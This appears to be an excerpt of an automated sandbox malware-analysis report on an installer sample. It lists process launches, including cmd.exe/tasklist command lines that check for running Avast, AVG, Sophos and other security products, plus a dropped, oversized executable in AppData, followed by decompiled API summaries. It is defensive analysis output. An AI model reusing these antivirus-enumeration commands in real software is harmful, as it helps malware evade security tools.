                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:12:03:14
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:12:03:14
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Imagebase:0x7ff630df0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:12:03:14
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:12:03:14
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:0x7ff62ba70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:12:03:14
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avastui.exe"
Imagebase:0x7ff788f00000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Imagebase:0x7ff630df0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:0x7ff62ba70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avgui.exe"
Imagebase:0x7ff788f00000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Imagebase:0x7ff630df0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:0x7ff62ba70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "nswscsvc.exe"
Imagebase:0x7ff788f00000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:12:03:15
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                Imagebase:0x7ff630df0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                Imagebase:0x7ff62ba70000
                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:12:03:15
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                Imagebase:0x7ff788f00000
                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:12:03:20
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 6.6%
Total number of Nodes: 274
Total number of Limit Nodes: 13

Control-flow Graph

control_flow_graph 379 4c5fe3-4c6094 GetVersion 381 4c60a8-4c60aa call 4b7489 379->381 382 4c6096-4c60a5 GetProcessVersion 379->382 384 4c60af-4c60ef call 4b7445 LoadCursorW * 2 381->384 382->381
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetVersion.KERNEL32(?,?,?,004C5FDE), ref: 004C605A
                                                                                                                                                                                                  • GetProcessVersion.KERNEL32(00000000,?,?,?,004C5FDE), ref: 004C6097
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004C60C5
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004C60D0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CursorLoadVersion$Process
• String ID:
• API String ID: 2246821583-0

Control-flow Graph

APIs
• HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
• HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
  • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Heap$AllocCreateErrorLast
• String ID:
• API String ID: 2156799573-0

Control-flow Graph

APIs
• HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
• HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
  • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Heap$AllocCreateErrorLast
• String ID:
• API String ID: 2156799573-0
APIs
• HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
• HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
  • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Heap$AllocCreateErrorLast
• String ID:
• API String ID: 2156799573-0

Control-flow Graph

APIs
• __EH_prolog.LIBCMT ref: 0040165E
  • Part of subcall function 004C4D62: RegQueryValueExW.KERNEL32(00000000,?,00000000,?,?,?,00000001,?,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000), ref: 004C4D9B
  • Part of subcall function 004C4D62: RegCloseKey.ADVAPI32(00000000,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000,?), ref: 004C4DA4
  • Part of subcall function 004C4D62: GetPrivateProfileIntW.KERNEL32(?,?,00000000,?), ref: 004C4DC3
  • Part of subcall function 004C4DCE: __EH_prolog.LIBCMT ref: 004C4DD3
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
  • Part of subcall function 0041D3FD: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000000E,?), ref: 0041D431
  • Part of subcall function 004B206D: InterlockedIncrement.KERNEL32(-000000F4), ref: 004B20B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prologInterlocked$CloseDecrementFolderIncrementPathPrivateProfileQuerySpecialValue
• String ID: AllowDuplicates$AlwaysOnTop$AlwaysShowControlBar$AutoCheckUpdate$AutoCheckUpdateDays$AutoCloseApp$AutoResumeInterrupted$DropBox.Left$DropBox.Top$EscToExitFullScreenMode$FilterIndex$LastFolder$LastScanSubfolders$Layout$LoadLastPlaylist$MainWindow.Height$MainWindow.Left$MainWindow.Top$MainWindow.Width$MaxRecentFiles$MaxRecentPlaylists$Mute$PlaylistViewStyle$PreventScreenSaver$RememberPosition$RememberRecentFiles$RememberRecentPlaylists$Repeat$Settings$ShowDefinition$ShowDropBox$ShowDuration$ShowIcon$ShowTitle$TempFolder$Thumbnail.Time$ThumbnailG.Height$ThumbnailG.Width$Transparent$Volume$ZoomRatio
• API String ID: 2878767568-943712644

Control-flow Graph

control_flow_graph 120 4c6214-4c6231 EnterCriticalSection 121 4c6240-4c6245 120->121 122 4c6233-4c623a 120->122 123 4c6247-4c624a 121->123 124 4c6262-4c626b 121->124 122->121 125 4c62f9-4c62fc 122->125 126 4c624d-4c6250 123->126 127 4c626d-4c627e GlobalAlloc 124->127 128 4c6280-4c629c GlobalHandle GlobalUnlock GlobalReAlloc 124->128 129 4c62fe-4c6301 125->129 130 4c6304-4c6325 LeaveCriticalSection 125->130 131 4c625a-4c625c 126->131 132 4c6252-4c6258 126->132 133 4c62a2-4c62ae 127->133 128->133 129->130 131->124 131->125 132->126 132->131 134 4c62cb-4c62f8 GlobalLock call 496de0 133->134 135 4c62b0-4c62c6 GlobalHandle GlobalLock LeaveCriticalSection call 4aff38 133->135 134->125 135->134
APIs
• EnterCriticalSection.KERNEL32(0050B060,005095E8,00000000,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C6223
• GlobalAlloc.KERNEL32(00002002,00000000,?,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C6278
• GlobalHandle.KERNEL32(007626E0), ref: 004C6281
• GlobalUnlock.KERNEL32(00000000), ref: 004C628A
• GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004C629C
• GlobalHandle.KERNEL32(007626E0), ref: 004C62B3
• GlobalLock.KERNEL32(00000000), ref: 004C62BA
• LeaveCriticalSection.KERNEL32(0049689D,?,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C62C0
• GlobalLock.KERNEL32(00000000), ref: 004C62CF
• LeaveCriticalSection.KERNEL32(?), ref: 004C6318
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
• String ID:
• API String ID: 2667261700-0
• Opcode ID: 413cfacae1f42b828034434364dd8bc2c24a0cefcd0f73d0b1ef7d73a0587937
• Instruction ID: cf1a7b870f0e7d84935cadd3de424ab408148836a8ecbda0050e2075fff26837
• Opcode Fuzzy Hash: 413cfacae1f42b828034434364dd8bc2c24a0cefcd0f73d0b1ef7d73a0587937
• Instruction Fuzzy Hash: A431BC792003059FD760AF69DC89E2AB7E9FB44300B018A7EF892C3661E775F8048B54

Control-flow Graph

control_flow_graph 139 41b548-41b574 RegOpenKeyExW 140 41b5b4-41b5c0 RegCloseKey 139->140 141 41b576-41b587 RegOpenKeyExW 139->141 142 41b5c4-41b5c8 140->142 141->140 143 41b589-41b59f RegOpenKeyExW 141->143 143->140 144 41b5a1-41b5b2 RegOpenKeyExW 143->144 144->140 145 41b5c2 144->145 145->142
APIs
• RegOpenKeyExW.KERNEL32(80000002,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B570
• RegOpenKeyExW.KERNEL32(80000001,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B583
• RegOpenKeyExW.KERNEL32(80000002,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B59B
• RegOpenKeyExW.KERNEL32(80000001,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B5AE
• RegCloseKey.ADVAPI32(00000000), ref: 0041B5B7
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Open$Close
• String ID: Software\Apple Computer, Inc.\iTunes$Software\Apple, Inc.\iTunes
• API String ID: 3083169812-2508981905
• Opcode ID: b4c0b82fe578a96844b16a804d571b8e36904e14a481291f64605816a4a3084d
• Instruction ID: 0bf58a548db8b678b3fdef80781bb253a552e90b61d530aea4e121a184306a76
• Opcode Fuzzy Hash: b4c0b82fe578a96844b16a804d571b8e36904e14a481291f64605816a4a3084d
• Instruction Fuzzy Hash: B101627160021DFEFB20C3929D45FFB7AADDB44B88F20003ABE04F5181D7A4AE4496B8

Control-flow Graph

APIs
• __EH_prolog.LIBCMT ref: 00403AB2
  • Part of subcall function 00404245: __EH_prolog.LIBCMT ref: 0040424A
  • Part of subcall function 004011CF: LoadCursorW.USER32(?,00000191), ref: 004011F6
  • Part of subcall function 00401659: __EH_prolog.LIBCMT ref: 0040165E
  • Part of subcall function 00403FBA: __EH_prolog.LIBCMT ref: 00403FBF
  • Part of subcall function 004B57A7: ShowWindow.USER32(?,?,0040A5CD,00000000), ref: 004B57B5
• UpdateWindow.USER32(?), ref: 00403BC0
  • Part of subcall function 004B54D9: DragAcceptFiles.SHELL32(?,?), ref: 004B54E0
• PostMessageW.USER32(?,000057FC,00000000,00000000), ref: 00403BFE
• PostMessageW.USER32(?,000057F2,00000000,00000001), ref: 00403C16
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$MessagePostWindow$AcceptCursorDragFilesLoadShowUpdate
• String ID: Tomabo$`N
• API String ID: 2519598137-2192252995
• Opcode ID: e196036f6a4c967a6dd153ec47ffa0ccbb0917f413654e1d21e7365c827d2897
• Instruction ID: 4e12a13fbca08d1458972ce396d1561db928aaf09fd47eff7d91b750cd480921
• Opcode Fuzzy Hash: e196036f6a4c967a6dd153ec47ffa0ccbb0917f413654e1d21e7365c827d2897
• Instruction Fuzzy Hash: F441D334700644AFDB14FBA5DC51FAEBBA9AF54308F10407EB506A72C2DA7CAE058719

Control-flow Graph

control_flow_graph 202 4c4c88-4c4cbe RegOpenKeyExW 203 4c4cfa-4c4d03 202->203 204 4c4cc0-4c4cdd RegCreateKeyExW 202->204 206 4c4d0a-4c4d0d 203->206 207 4c4d05-4c4d08 RegCloseKey 203->207 204->203 205 4c4cdf-4c4cf8 RegCreateKeyExW 204->205 205->203 208 4c4d0f-4c4d12 RegCloseKey 206->208 209 4c4d14-4c4d1b 206->209 207->206 208->209
APIs
• RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
• RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
• RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
• RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
• RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                                                                                  • String ID: software
                                                                                                                                                                                                  • API String ID: 1740278721-2010147023
                                                                                                                                                                                                  • Opcode ID: b6ee44f51cd3453057349a4c5538b36330712ed3234f2ffb3c0211161fe7654c
                                                                                                                                                                                                  • Instruction ID: 01cfaa8c328abbbb0188727767fc5933a758e1c0896283940e8cb0ec6d885571
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ee44f51cd3453057349a4c5538b36330712ed3234f2ffb3c0211161fe7654c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0311E676901158FBDB61DB9ACD88DEFFFBCEFC5704B1000AAA905A2121D3715A00DBA4

Control-flow Graph

APIs
• __EH_prolog.LIBCMT ref: 0041F169
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00509088,Settings), ref: 0041F19E
  • Part of subcall function 0041EF98: __EH_prolog.LIBCMT ref: 0041EF9D
  • Part of subcall function 0041EF98: GetModuleFileNameW.KERNEL32(?,00000000,000003FF,?,?,00508FBC), ref: 0041F00A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$FileFolderModuleNamePathSpecial
• String ID: %s\%s\%s$MP4 Player$Settings$Tomabo
• API String ID: 552222073-520340064
• Opcode ID: afe5304a1a8606663fa0dff7bfd115714ad4f3548ae98419088cda19dfabae77
• Instruction ID: 149e69f5aa4820c5b46e142cd9b29830a07ea0fa65eda547c9cec1cdaa9fb26b
• Opcode Fuzzy Hash: afe5304a1a8606663fa0dff7bfd115714ad4f3548ae98419088cda19dfabae77
• Instruction Fuzzy Hash: CA11937194011CBACB00EF95DC41AEEBBB8FF14344F40447EF505A2181CB785A49CBA9

Control-flow Graph

APIs
• KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004B7496
• GetSystemMetrics.USER32(0000000C), ref: 004B749D
• GetDC.USER32(00000000), ref: 004B74B6
• GetDeviceCaps.GDI32(00000000,00000058), ref: 004B74C7
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B74CF
• ReleaseDC.USER32(00000000,00000000), ref: 004B74D7
  • Part of subcall function 004C6003: GetSystemMetrics.USER32(00000002), ref: 004C6015
  • Part of subcall function 004C6003: GetSystemMetrics.USER32(00000003), ref: 004C601F
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
• String ID:
• API String ID: 1031845853-0
• Opcode ID: a7824fac2594c6d583719904e4f4600217739ce21e6b45daf7cec4986dc66ae9
• Instruction ID: fbbfe9c0f7f0e0cba4edf02f00eb2defb6cef4ca40895e2c57ae65a168e5b4ee
• Opcode Fuzzy Hash: a7824fac2594c6d583719904e4f4600217739ce21e6b45daf7cec4986dc66ae9
• Instruction Fuzzy Hash: 42F05434640700AEE3606B739C89F577BA4EF90756F11482EF245562D0DBB898458FB5

